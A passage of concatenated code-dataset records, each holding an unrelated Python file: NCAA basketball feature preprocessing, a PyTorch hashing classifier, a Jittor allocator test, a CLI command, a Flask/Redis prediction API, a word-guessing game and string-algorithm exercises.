data[season][team][\"total_score\"]\n\t\t\tdata[season][team][\"avg_score\"] = total_score / num_games\n\n\t\t\t# Average rebound percentage\n\t\t\tdata[season][team][\"avg_off_reb_percentage\"] = data[season][team][\"total_off_reb\"] / float(num_games)\n\t\t\tdata[season][team][\"avg_def_reb_percentage\"] = data[season][team][\"total_def_reb\"] / float(num_games)\n\n\treturn data\n\ndef add_seeds(data):\n\tseed_data = \"../data/TourneySeeds.csv\"\n\n\twith open(seed_data, \"r\") as fi:\n\t\tnext(fi)\n\t\tfor line in fi:\n\t\t\tseason, seed_string, team = line.rstrip('\\n').split(\",\")\n\t\t\tseed = 1 / float(re.findall('\\d+', seed_string)[0])\n\n\t\t\tif int(season) < 2003:\n\t\t\t\tcontinue\n\n\t\t\t#print(\"Season: %s\\t| seed: %s\\t| team: %s\" % (season, seed, team))\n\n\t\t\tdata[season][team][\"seed_string\"] = seed_string\n\t\t\tdata[season][team][\"bracket_seed\"] = seed\n\n\treturn data\n\ndef add_momentum(data, decay_rate):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tdata[season][team][\"momentum\"] = 0\n\t\t\tnum_games = data[season][team][\"num_games\"]\n\n\t\t\tfor i in range(len(data[season][team][\"game_results\"])):\n\t\t\t\tdecay_t = num_games - i\n\t\t\t\tgame_result = data[season][team][\"game_results\"][i]\n\n\t\t\t\tdata[season][team][\"momentum\"] += game_result * np.exp(-decay_t * decay_rate)\n\n\treturn data\n\ndef add_percentages(data):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tdata[season][team][\"win_percentage\"] = 0\n\t\t\tnum_games = data[season][team][\"num_games\"]\n\n\t\t\tfor i in range(len(data[season][team][\"game_results\"])):\n\t\t\t\tgame_result = data[season][team][\"game_results\"][i]\n\n\t\t\t\tif game_result == 1:\n\t\t\t\t\tdata[season][team][\"win_percentage\"] += 1\n\n\t\t\tdata[season][team][\"win_percentage\"] /= float(num_games)\n\n\t\t\t##\n\t\t\tdata[season][team][\"fg_percentage\"] = data[season][team][\"fgm\"] / float(data[season][team][\"fga\"])\n\t\t\tdata[season][team][\"fg3_percentage\"] = data[season][team][\"fgm3\"] / float(data[season][team][\"fga3\"])\n\t\t\tdata[season][team][\"ft_percentage\"] = data[season][team][\"ftm\"] / float(data[season][team][\"fta\"])\n\n\treturn data\n\ndef decay_test(data):\n\tfor decay_rate in decay_rates:\n\n\t\tdata = add_momentum(data, decay_rate)\n\n\t\tx = []\n\t\ty = []\n\t\tfor team in data[\"2003\"]:\n\t\t\tx.append(team)\n\t\t\ty.append(data[\"2003\"][team][\"momentum\"])\n\n\t\tplt.scatter(x, y)\n\t\tplt.title(\"Decay Rate: %s\" % (decay_rate))\n\t\tplt.savefig(\"decay_rate_\"+str(decay_rate)+\".png\")\n\t\tplt.show()\n\ndef print_feature(feat):\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tprint(\"Season: %s\\t| Team: %s\\t| %s: %s\" % (season, team, feat, data[season][team][feat]))\n\ndef load_data():\n\tdata = pickle.load(open(\"pickled_files/data.p\", \"rb\"))\n\treturn data\n\ndef dump_data(data):\n\tpickle.dump(data, open(\"pickled_files/data.p\", \"wb\"))\n\ndef feature_vectorizor(data, feature_list):\n\tfeature_vec = {}\n\tnormalize_vec = []\n\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tfor feature in feature_list:\n\t\t\t\tif season not in feature_vec:\n\t\t\t\t\tfeature_vec[season] = {}\n\t\t\t\tif team not in feature_vec[season]:\n\t\t\t\t\tfeature_vec[season][team] = []\n\n\t\t\t\tif feature not in data[season][team]:\n\t\t\t\t\t#print(\"data['%s']['%s']: has no %s\" % (season, team, feature))\n\t\t\t\t\tfeature_vec[season][team].append(-1)\n\t\t\t\telse:\n\t\t\t\t\tfeature_vec[season][team].append(data[season][team][feature])\n\n\t\t\tnormalize_vec.append(feature_vec[season][team])\n\n\t# Normalize\n\tfeatures_normalized = preprocessing.normalize(normalize_vec)\n\n\ti=0\n\t#print(\"Total [season][team]: %s\\t| feature_vec: %s\" % (len(data)*len(data[\"2003\"]), len(features_normalized)))\n\n\tfor season in data:\n\t\tfor team in data[season]:\n\t\t\tfeature_vec[season][team] = features_normalized[i]\n\t\t\ti += 1\n\n\treturn feature_vec\n\ndef training_tuples(filename):\n\n\tresults = []\n\twith open(filename, \"r\") as fi:\n\t\tnext(fi)\n\n\t\tfor lines in fi:\n\t\t\t# Parse the line\n\t\t\tl = lines.rstrip('\\n').split(',')\n\t\t\t#print(len(lineinfo))\n\n\t\t\tseason = l[0]\n\t\t\tday_num = l[1]\n\t\t\tw_team = l[2]\n\t\t\tw_score = int(l[3])\n\t\t\tl_team = l[4]\n\t\t\tl_score = int(l[5])\n\n\t\t\tif random.random() < 0.5:\n\t\t\t\tresults.append((season, w_team, l_team, 1))\n\t\t\telse:\n\t\t\t\tresults.append((season, l_team, w_team, 0))\n\n\treturn results\n\ndecay_rates = [1, 1.1, 1.2, 1.3, 1.4, 1.5]\n\nfeature_list = ['avg_def_reb_percentage', 'avg_score', 'avg_fgm3', 'avg_dr', 'avg_fga3', 'avg_off_reb_percentage', 'end_streak', 'avg_stl', 'avg_ast', 'fg_percentage', 'avg_or', 'momentum', 'avg_fgm', 'fg3_percentage', 'avg_fga', 'win_percentage', 'num_games', 'avg_blk', 'avg_ftm', 'avg_fta', 'max_streak', 'ft_percentage', 'avg_to', 'avg_pf', 'bracket_seed']\n\n\ndata, header = init_feature_vector()\n#data = load_data()\n\ndata = add_vector_averages(data, header)\ndata = add_momentum(data, decay_rates[3])\ndata = add_percentages(data)\ndata = add_seeds(data)\n\ndump_data(data)\nprint(data[\"2004\"][\"1104\"])\n\nfeature_vec= feature_vectorizor(data, feature_list)\n#feature_vec = pickle.load(open(\"pickled_files/normalized_feature_vec.p\"))\n\npickle.dump(feature_vec, open(\"pickled_files/decay_True_normalized_feature_vec.p\", \"wb\"))\n\nseason_file = \"../data/RegularSeasonDetailedResults.csv\"\nresults = training_tuples(season_file)\n#results = pickle.load(open(\"pickled_files/season_tuples.p\"))\n\npickle.dump(results, open(\"pickled_files/season_tuples.p\", \"wb\"))\n# print(results)\nprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n\nbracket_file = \"../data/TourneyDetailedResults.csv\"\nresults = training_tuples(season_file)\n#results = pickle.load(open(\"pickled_files/bracket_tuples.p\"))\n\npickle.dump(results, open(\"pickled_files/bracket_tuples.p\", \"wb\"))\n# print(results)\n\n#for i in range(len(feature_list)):\n\t#print(\"%s:\\t%s\" % (feature_list[i], feature_vec[\"2003\"][\"1104\"][i]))\n","sub_path":"AdaBoost/preprocess_data.py","file_name":"preprocess_data.py","file_ext":"py","file_size_in_byte":9288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"12159496","text":"import os\nimport sys\nimport torch\nfrom torch.serialization import save\nfrom torch.serialization import load\nimport string\nfrom random import shuffle\n\nfrom datasearch import *\nfrom stringhash import str2bigramhashlist\nfrom stringhash import str2unigramhashlist\n\n\n# No pre-trained word embedding\n# No negative sampling.\n# No subsampling.\n# Use hash value to get the index of the word.\n# classify NL string to upper-class python documents.\n\n\n# Constants and Hyperparameters\n_C = {}\n_C['DEBUG_MODE'] = False\n_C['LAB_SERVER_USE'] = True\n_C['LAB_SERVER_USE_GPU_NUM'] = \"03\"\n# If ITER_COUNT_DEBUG_INFO_PERIOD <= 0, program will not print losses.\n_C['ITER_COUNT_DEBUG_INFO_PERIOD'] = 1000\n# If TRAIN_CONTENTNUM_UPPER_LIMIT <= 0, program will learn for the whole training set.\n_C['TRAIN_CONTENTNUM_UPPER_LIMIT'] = 0\n\n_C['HASH_BIT_SIZE'] = 18\n_C['DIMENSION'] = 64\n_C['LEARNING_RATE'] = 0.01\n_C['EPOCH'] = 5\n\n_C['W_IN_FILENAME'] = 'result_r/zerobase_learned_full_r_4_w_in.pt'\n_C['W_OUT_FILENAME'] = 'result_r/zerobase_learned_full_r_4_w_out.pt'\n\n\ndef print_constants_to_str():\n # input : void\n # output : string s\n s = ''\n for key in _C:\n s += str(key) + '\\t: ' + str(_C[key]) + '\\n'\n return s\n\n\ndef get_gradient(input_hash, output_class, W_in, W_out):\n # input_hash : int\n # output_class : int. It should be the value between [0, K], the value K is from the W_out's shape.\n # W_in : torch.tensor((2 ** HASH_BIT_SIZE), D)\n # W_out : torch.tensor(K, D)\n\n # loss : torch.tensor(1)\n # grad_in : torch.tensor(1, D)\n # grad_out : torch.tensor(K, D)\n\n _, D = W_in.size()\n inputVector = W_in[input_hash]\n out = W_out.mm(inputVector.view(D, 1))\n\n expout = torch.exp(out)\n softmax = expout / expout.sum()\n loss = -torch.log(softmax[output_class])\n\n grad = softmax\n grad[output_class] -= 1.0\n\n grad_in = grad.view(1, -1).mm(W_out)\n grad_out = grad.mm(inputVector.view(1, -1))\n\n return loss, grad_in, grad_out\n\n\ndef train_one_content(input_string, output_classes, W_in, W_out, learning_rate=_C['LEARNING_RATE']):\n # INPUTS\n # input_string : string (all content)\n # output_classes : int list. Each of them should be the value between [0, K], the value K is from the W_out's shape.\n # W_in : torch.tensor((2 ** HASH_BIT_SIZE), D)\n # W_out : torch.tensor(K, D)\n\n # OUTPUTS\n # avg_loss : float. average loss recordecd while learning.\n # W_in (learned)\n # W_out (learned)\n\n losses = []\n inputhashlist = str2unigramhashlist(input_string, _C['HASH_BIT_SIZE'])\n # print('PROFILING INFO : len(output_classes) * len(inputhashlist) = ' +\n # str(len(output_classes) * len(inputhashlist)))\n for output_class in output_classes:\n for h in inputhashlist:\n L, G_in, G_out = get_gradient(h, output_class, W_in, W_out)\n # I don't know why squeeze method needed, but I don't test whether it works well when squeeze method does not exist.\n losses.append(L.item())\n W_in[h] -= learning_rate * G_in.squeeze()\n W_out -= learning_rate * G_out\n\n avg_loss = 0\n if len(losses) != 0:\n avg_loss = sum(losses) / len(losses)\n\n return avg_loss, W_in, W_out\n\n\ndef main():\n # GPU setting\n if _C['LAB_SERVER_USE']:\n # Set GPU number to use\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = _C['LAB_SERVER_USE_GPU_NUM']\n\n dimension = _C['DIMENSION']\n iter_count_debug_info_period = _C['ITER_COUNT_DEBUG_INFO_PERIOD']\n\n print(print_constants_to_str())\n\n # Xavier initialization of weight matrices\n W_in = torch.randn((1 << _C['HASH_BIT_SIZE']),\n dimension).cuda() / (dimension**0.5)\n W_out = torch.randn(len(num2upperpydoc), dimension).cuda() / (dimension**0.5)\n\n # LEARNING\n print('Collect all training filenames.')\n obj3_filenamelist = obj3_allfilelist()\n iter_count = 0\n avglosses = []\n print('Training Start.')\n for epoch in range(_C['EPOCH']):\n print(\"EPOCH \" + str(epoch))\n shuffle(obj3_filenamelist)\n for filename in obj3_filenamelist:\n iter_count += 1\n if _C['TRAIN_CONTENTNUM_UPPER_LIMIT'] > 0 and _C['TRAIN_CONTENTNUM_UPPER_LIMIT'] < iter_count:\n break\n\n content, answers = obj3_readfile(filename, isupperpydocused=True)\n\n # train title\n lastfilename = obj3_getdistinctfilename(filename)\n _, W_in, W_out = train_one_content(\n lastfilename, answers, W_in, W_out, learning_rate=_C['LEARNING_RATE'])\n\n # train content\n avgloss, W_in, W_out = train_one_content(\n content, answers, W_in, W_out, learning_rate=_C['LEARNING_RATE'])\n\n avglosses.append(avgloss)\n if (iter_count_debug_info_period > 0) and (iter_count % iter_count_debug_info_period == 0):\n print(\"Content Iteration : \" + str(iter_count))\n if len(avglosses) != 0:\n print(\"LOSS : %f\" % (sum(avglosses)/len(avglosses),))\n else:\n print(\"LOSS : N/A\")\n avglosses = []\n\n sys.stdout.flush()\n\n # SAVE W_in W_out to file.\n save(W_in, _C['W_IN_FILENAME'])\n save(W_out, _C['W_OUT_FILENAME'])\n\n\nif not _C['DEBUG_MODE']:\n main()\n","sub_path":"PyMaker/learning/train_zerobase_r.py","file_name":"train_zerobase_r.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"336229454","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/cjld/new_jittor/jittor/python/jittor/test/test_allocator2.py\n# Compiled at: 2020-03-20 04:44:53\n# Size of source mod 2**32: 1519 bytes\nimport unittest, jittor as jt, gc\n\ndef test(h, w, total_alloc_call, total_alloc_byte, total_free_call=0, total_free_byte=0):\n jt.clean()\n jt.gc()\n with jt.flag_scope(use_stat_allocator=1):\n a = jt.random([h, w])\n b = a + a\n c = a * b\n c.data\n del a\n del b\n del c\n gc.collect()\n x = (\n jt.flags.stat_allocator_total_alloc_call,\n jt.flags.stat_allocator_total_alloc_byte,\n jt.flags.stat_allocator_total_free_call,\n jt.flags.stat_allocator_total_free_byte)\n y = (\n total_alloc_call, total_alloc_byte, total_free_call, total_free_byte)\n assert x == y, (x, y)\n\n\nclass TestAllocator2(unittest.TestCase):\n\n def test_stat(self):\n test(10, 10, 1, 1048576)\n test(100, 100, 1, 1048576)\n test(1000, 1000, 1, 20971520)\n test(8000, 1000, 2, 67108864)\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"pycfiles/jittor-1.0.0.tar/test_allocator2.cpython-37.py","file_name":"test_allocator2.cpython-37.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"284186256","text":"import click\nfrom sys import exit\nfrom wasabi import Printer\nfrom ..utils import get_action_metadata\nfrom ..client.pretty import pretty_print_yaml\n\nmsg = Printer()\n\n\n@click.command(name=\"show\")\n@click.argument(\"action_name\", nargs=-1, required=True)\ndef cmd_show(action_name):\n \"\"\" Show examples for an action\"\"\"\n action_name = \" \".join(action_name)\n try:\n action = get_action_metadata(action_name, \"show\")\n except ModuleNotFoundError:\n msg.fail(f\"No action module available for action name '{action_name}'\")\n print(\"You can get the list of available actions with:\")\n print(\"\\topenpipe help\")\n exit(2)\n print(\"### Pipeline Examples\")\n pretty_print_yaml(action[\"test_filename\"])\n print(\"### End Of Pipeline Examples\")\n","sub_path":"openpipe/cli/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"607919077","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport configparser\nimport warnings\nfrom argparse import ArgumentParser\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\nimport sys\nimport logging\nfrom flask import Flask, render_template, request, abort, redirect, url_for, session, jsonify, make_response\nfrom flask_cors import CORS\nfrom wtforms import Form, TextField\nfrom datetime import datetime\nimport json\nimport pandas as pd\n\napp = Flask(__name__)\napp.app_context().push()\napp.secret_key = 'secret'\nlogger = app.logger\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.DEBUG)\napp.debug = True\nlogger.name = 'data_predict'\nCORS(app)\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nlogging.basicConfig(filename=config['DATA']['LOG_PATH'], filemode='a', format='%(name)s - %(levelname)s - %(message)s')\n\nfrom predictive_maintenance.PredictValue import predict_value\npredict_value = predict_value()\nimport os\nimport redis\nfrom rq import Queue\n\nr = redis.Redis()\nq_high = Queue('high', connection=r)\nq_mid = Queue('mid', connection=r)\nq_low = Queue('low', connection=r)\nq_default = Queue('default', connection=r)\n\nmodel1 = config['DATA']['MODEL1']\nmodel2 = config['DATA']['MODEL2']\ninput_folder = config['DATA']['input_fl']\noutput_foler = config['DATA']['output_fl']\ntimeout= config['DATA']['JOB_TIMEOUT']\n\ndef to_float(val):\n try:\n return float(val)\n except ValueError:\n return None\n except TypeError:\n return None\n\n\n@app.route(\"/data_predict\", methods=['GET', 'POST'])\ndef get_predict_data():\n start = datetime.now()\n \n header = None\n url = request.url\n status = 0\n \n try:\n modelname = request.args.get(\"modelname\")\n header = modelname\n filename = request.args.get(\"filename\")\n priority = int(request.args.get(\"priority\"))\n except Exception as ex:\n response = jsonify({'error_code': 400, \n 'error_msg':'missing parameters'})\n return make_response((response))\n\n out_path = os.path.join(output_foler,\"{0}_predictions_{1}\".format(modelname, filename))\n try: \n \n inputfile_path = os.path.join(input_folder,filename) \n df = pd.read_csv(inputfile_path, na_values=['?'])\n \n df.index = df['curveNb']\n X_test = df.drop(labels=['curveNb','2P_yearMonth'], axis=1) \n \n if priority == 1: \n job = q_high.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to high queue at {job.enqueued_at}\")\n \n elif priority == 2: \n job = q_mid.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to mid queue at {job.enqueued_at}\") \n \n elif priority == 3: \n job = q_low.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to low queue at {job.enqueued_at}\") \n\n else: \n job = q_default.enqueue_call(func=predict_value.predict, args=(X_test, modelname, out_path), timeout=timeout)\n logger.info(f\"Task ({job.id}) added to default queue at {job.enqueued_at}\") \n \n status = 200\n except KeyError as ex:\n msg = {'error_code':404,\n 'error_message':'{}'.format(ex)}\n except Exception as ex:\n msg = {'error_code':520,\n 'error_message':'{}'.format(ex)}\n\n if status == 200:\n msg = {'status_code': 200,\n 'status': 'SUCCESS' }\n else:\n msg = {'error_code': 400,\n 'error_message': msg }\n\n time_taken = (datetime.now() - start)\n logger.info('Request served')\n logger.info('time_taken: {}'.format(time_taken))\n\n response = {'status':msg,'url':url,'output file':os.path.basename(out_path)}\n logger.info(response)\n return jsonify({header:response})\n\n\n@app.route('/health_check', methods=['GET'])\ndef health_check():\n return make_response(('SUCCESS', 200))\n\n\nif __name__ == \"__main__\":\n config = configparser.ConfigParser()\n config.read('config.ini')\n default_port = int(config['DATA']['port'])\n parser = ArgumentParser(description='Pass Data')\n parser.add_argument('-p', '--port', default=default_port, help='port to listen on')\n args = parser.parse_args()\n app.run(\"0.0.0.0\", port=default_port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"141110694","text":"#Secret Word Game\n#author: R. Campbell Farish\nimport random\n\n\n### classes\n\n# letter info class holds onto toggle for if the letter has been guessed \n# and a list of references to where that letter is in the puzzle for quicker search later \nclass letter_info():\n\tdef __init__( self, letter ):\n\t\tself.letter = letter\n\t\tself.guessed = 0\n\t\tself.index_list = [] #(line,index)\n\n\t# return a dash if has been guessed otherwise return letter\n\tdef return_letter( self ):\n\t\tif self.guessed == 0:\n\t\t\treturn self.letter\n\t\telse:\n\t\t\treturn '-'\n\n\n\n### functions\n\n# returns a string of the alphabet with letters that have been guessed lined out\ndef return_alphabetString( curr_alphabet ):\n\n\ttemp_alpha = [ \"\" ]\n\t\n\t# call sub funciton for 3 chunks of the alphabet with new lines in between\n\tfor c in alphabet_line1:\n\t\ttemp_alpha.append( curr_alphabet[c].return_letter() )\n\ttemp_alpha.append(\"\\n \")\n\t\n\tfor c in alphabet_line2:\n\t\ttemp_alpha.append( curr_alphabet[c].return_letter() )\n\ttemp_alpha.append(\"\\n\")\n\n\tfor c in alphabet_line3:\n\t\ttemp_alpha.append( curr_alphabet[c].return_letter() )\n\ttemp_alpha.append(\"\\n\")\n\n\treturn ' '.join( temp_alpha )\n\n\n# returns a string of the current state of the puzzle with guessed letters revealed\ndef return_puzzleString( curr_puzzle ):\n\n\ttemp_puzzle = \"\"\n\n\tfor x in range( 0, 4 ):\n\t\ttemp_puzzle += \" \" + \" \".join( curr_puzzle[x] ) + \"\\n\"\n\n\treturn temp_puzzle\n\n\n# print the entire gameBoard, compile the string and then send to print\ndef print_gameBoard( curr_alphabet, curr_puzzle, curr_score ):\n\n\t#line 1: hash tag boarder\n\tprint_string = \"###################\\n\"\n\n\t#line 2-4: alphabet\n\tprint_string += return_alphabetString( curr_alphabet )\n\n\t#line 5: has tag boarder\n\tprint_string += \"###################\\n\"\n\t\n\t#line 6-9: PUZZLE\n\tprint_string += return_puzzleString( curr_puzzle )\n\t\n\t#line 10: has tag boarder\n\tprint_string += \"###################\\n\"\n\n\t#line 11: level and score\n\tprint_string += \"LVS:%2d SCR:%7d\\n\" % ( lives_left, curr_score ) \n\n\t#line 12: has tag boarder\n\tprint_string += \"###################\\n\"\n\n\tprint( print_string )\n\n\ndef printNo():\n\tprint(\"\\n :( NO :( \")\n\t\n\ndef printYes():\n\tprint(\"\\n =D YES =D \")\n\n\n\n\n### variables\n\nalphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\nalphabet_line1 = \"ABCDEFGHI\"\nalphabet_line2 = \"JKLMNOPQ\"\nalphabet_line3 = \"RSTUVWXYZ\"\nword_list = [ [\"CHICKEN\", \"MONKEY\", \"OWL\", \"ELEPHANT\"], [\"LIZARD\", \"MOUSE\", \"HAMSTER\", \"LEOPARD\"], [\"ALLIGATOR\", \"LIONESS\", \"DOG\", \"PIGEON\"], [\"STORK\", \"LLAMA\", \"KITTEN\", \"PORCUPINE\"], [\"KOALA\", \"TURTLE\", \"KANGAROO\", \"SNAKE\"], [\"SALMON\", \"PANTHER\", \"DOLPHIN\", \"WHALE\"], [\"ROOSTER\", \"PENGUIN\", \"HOUND\", \"WORM\"], [\"MOOSE\", \"LAMB\", \"RHINO\", \"BEETLE\"], [\"ZEBRA\", \"BADGER\", \"LYNX\", \"COUGAR\"], [\"CHEETAH\", \"GRIZZLY\", \"SHARK\", \"GECKO\"]]\n\n\n\n\n# begin round\n\n# intialize variales\ncurr_level = 1\ncurr_score = 0\n\n\n# ask to play\nshould_exit = 0\nlives_left = 10\nwhile ( should_exit == 0 ):\n\n\tplay_choice = ( raw_input( \" PLAY AGAIN? (Y/N): \" ) ).upper()\n\t\n\tif play_choice == 'N':\n\t\tshould_exit = 1\n\t\n\telif play_choice == 'Y':\n\n\t\t# choose a word\n\t\tsecret_words = random.choice(word_list)\n\t\tsecret_words_all = secret_words[0] + secret_words[1] + secret_words[2] + secret_words[3]\n\t\tnum_of_letters_left = len(secret_words_all)\n\n\t\t# pre-process the word\n\n\t\t# intialize variales\n\t\tcurr_puzzle = [[],[],[],[]]\n\t\tcurr_alphabet = dict()\n\n\t\t# create a dictionary of letters \n\t\tfor c in alphabet:\n\t\t\tcurr_alphabet[c] = letter_info(c)\n\n\t\t# pre-process the four lines/words\n\t\tfor x in range( 0, 4 ):\n\t\t\tcounter = 0\n\t\t\tfor c in secret_words[x]:\n\t\t\t\t#blank out the game board\n\t\t\t\tcurr_puzzle[x].append('_')\n\t\t\t\t#record indicies of if/when they appear in secret word\n\t\t\t\tcurr_alphabet[c].index_list.append([x,counter])\n\t\t\t\tcounter = counter + 1\n\n\n\t\t#loop while the game is not won or lost (in won state or lost state)\n\t\twhile ( num_of_letters_left !=0 and should_exit == 0 ):\n\n\t\t\t# print Game Screen\n\t\t\tprint_gameBoard( curr_alphabet, curr_puzzle, curr_score )\n\n\t\t\t# get a single guess input \n\t\t\tvalid_guess = 0\n\t\t\twhile valid_guess == 0:\n\n\t\t\t\t# input a guess letter from the user\n\t\t\t\tcurr_guess = (raw_input(\" GUESS A LETTER: \")).upper()\n\t\t\t\t\n\t\t\t\t# break out and exit program with number 1\n\t\t\t\tif curr_guess == '1':\n\t\t\t\t\tshould_exit = 1\n\t\t\t\t\tvalid_guess = 1\n\t\t\t\t# make sure choice is letter\n\t\t\t\telif curr_guess not in alphabet:\n\t\t\t\t\tprint(\" LETTERS ONLY\")\n\t\t\t\t# make sure it's not empty\n\t\t\t\telif curr_guess == '':\n\t\t\t\t\tprint(\" I DIDN'T GET THAT\")\n\t\t\t\t# if it's a valid unguessed letter than move on\n\t\t\t\telif curr_alphabet[curr_guess].guessed == 0:\n\t\t\t\t\t#record that the letter has been guessed and set loop breaking condition\n\t\t\t\t\tcurr_alphabet[curr_guess].guessed = 1\n\t\t\t\t\tvalid_guess = 1\n\t\t\t\t# this letter has already been guessed, input again\n\t\t\t\telse:\n\t\t\t\t\t#or loop back around and try again\n\t\t\t\t\tprint(\" ALREADY GUESSED\")\n\n\t\t\tif should_exit == 0:\n\t\t\t\t#check if the inputed letter is in the secret word\n\t\t\t\ti_list = curr_alphabet[curr_guess].index_list\n\t\t\t\tif len(i_list) != 0:\n\t\t\t\t\t#if it is in the secret word, reveal letter in the secret word\n\t\t\t\t\tfor i in i_list:\n\t\t\t\t\t\tline_num = i[0]\n\t\t\t\t\t\tline_idx = i[1]\n\t\t\t\t\t\tcurr_line = curr_puzzle[line_num]\n\t\t\t\t\t\tcurr_line[line_idx] = curr_guess\n\t\t\t\t\t\tnum_of_letters_left = num_of_letters_left - 1\n\t\t\t\t\t\tcurr_score += 50\n\t\t\t\t\tprintYes()\n\t\t\t\telse:\n\t\t\t\t\tlives_left = lives_left - 1\n\t\t\t\t\tcurr_score -= 50\n\t\t\t\t\tif lives_left == 0:\n\t\t\t\t\t\tshould_exit = 1\n\t\t\t\t\tprintNo()\n\n\n\t\tif num_of_letters_left > 0:\t\n\t\t\tprint(\"WAY TO GO\")\n\t\t\tprint_puzzle( curr_puzzle )\n\t\telif should_exit == 1:\n\t\t\tprint(\"GOODBYE.\")\n\t\telse:\n\t\t\tprint(\"DANG :(\")","sub_path":"SecretWord_Game_v1.0.py","file_name":"SecretWord_Game_v1.0.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173232851","text":"# encoding=utf-8\nimport collections\n\n\nclass Solution(object):\n \"\"\"\n 对于字符串查找问题,可使用双重 for 循环解决,效率更高的则为 KMP 算法。\n 双重 for 循环的使用较有讲究,因为这里需要考虑目标字符串比源字符串短的可能。\n 对目标字符串的循环肯定是必要的,所以可以优化的地方就在于如何访问源字符串了。\n 简单直观的解法是利用源字符串的长度作为 for 循环的截止索引,这种方法需要处理\n 源字符串中剩余长度不足以匹配目标字符串的情况,而更为高效的方案则为仅遍历源字\n 符串中有可能和目标字符串匹配的部分索引。\n \"\"\"\n\n @classmethod\n def find_sub_str(cls, source, target):\n if source is None and target is None:\n return -1\n for i in range((len(source) - len(target)) + 1):\n for j in range(len(target)):\n if source[i + j] != target[j]:\n break\n else:\n return i\n return -1\n\n \"\"\"\n 判断两个字符串是否互为变位词,若区分大小写,考虑空白字符时,直接来理解可以认为两\n 个字符串的拥���各不同字符的数量相同。对于比较字符数量的问题常用的方法为遍历两个字\n 符串,统计其中各字符出现的频次,若不等则返回false. 有很多简单字符串类面试题都是\n 此题的变形题。\n \"\"\"\n\n @classmethod\n def anagram1(cls, first_str, second_str):\n return collections.Counter(first_str) == collections.Container(second_str)\n\n @classmethod\n def anagram2(cls, first_str, second_str):\n if len(first_str) != len(second_str):\n return False\n if not first_str or not second_str:\n return False\n counter = [0 for i in range(256)]\n for i in range(len(first_str)):\n counter[ord(first_str[i])] += 1\n counter[ord(second_str[i])] -= 1\n for item in counter:\n if item != 0:\n return False\n return True\n\n @classmethod\n def a_contains_b(cls, str_a, str_b):\n letters = collections.defaultdict(int)\n for letter in str_a:\n letters[letter] += 1\n for letter in str_b:\n if letter in letters:\n if letters[letter] < 0:\n return False\n else:\n letters[letter] -= 1\n else:\n return False\n return True\n\n @classmethod\n def anagram_list1(cls, str_list):\n if len(str_list) < 2:\n return []\n result = []\n visited = [False] * len(str_list)\n for i, str1 in enumerate(str_list):\n has_anagram = False\n for j, str2 in enumerate(str_list):\n if i < j and not visited[j] and cls.anagram2(str1, str2):\n result.append(str2)\n has_anagram = True\n visited[j] = True\n if not visited[i] and has_anagram:\n result.append(str1)\n return result\n\n @classmethod\n def anagram_list2(cls, str_list):\n if len(str_list) < 2:\n return []\n dic = {}\n result = []\n for s in str_list:\n if ''.join(sorted(s)) not in dic:\n dic[''.join(sorted(s))] = 1\n else:\n dic[''.join(sorted(s))] += 1\n for s in str_list:\n if dic[''.join(sorted(s))] > 1:\n result.append(s)\n return result\n\n @classmethod\n def longest_common_substring_num(cls, str1, str2):\n max_num = 0\n for i in range(len(str1)):\n for j in range(len(str2)):\n step = 0\n while i + step < len(str1) and j + step < len(str2) and str1[i + step] == str2[j + step]:\n step += 1\n if step > max_num:\n max_num = step\n return max_num\n\n @classmethod\n def rotate_str(cls, line, offset):\n if line is None:\n return line\n offset %= len(line)\n before = line[:len(line) - offset]\n after = line[len(line) - offset:]\n return after + before\n\n\nif __name__ == '__main__':\n c = collections.Counter(['n', 'k', 'n', 'i'])\n print(c.keys())\n dic1 = {'n': 1, 'h': 2}\n dic2 = {'n': 1, 'h': 3}\n if dic1 == dic2:\n print('true')\n ss = Solution.anagram2('nihao', 'haoni')\n print(ss)\n\n cc = Solution.anagram_list2(['nihao', 'haoni', 'inhao', 'ggg', 'onhai'])\n print(cc)\n\n ff = Solution.longest_common_substring_num('nihao123', '123')\n print(ff)\n\n gg = Solution.rotate_str('nihao123', 3)\n print(gg)\n","sub_path":"algorithm/shi_yan_lou/algorithm_str.py","file_name":"algorithm_str.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361987212","text":"\"\"\"\nCopyright (c) 2015 SONATA-NFV\nALL RIGHTS RESERVED.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use 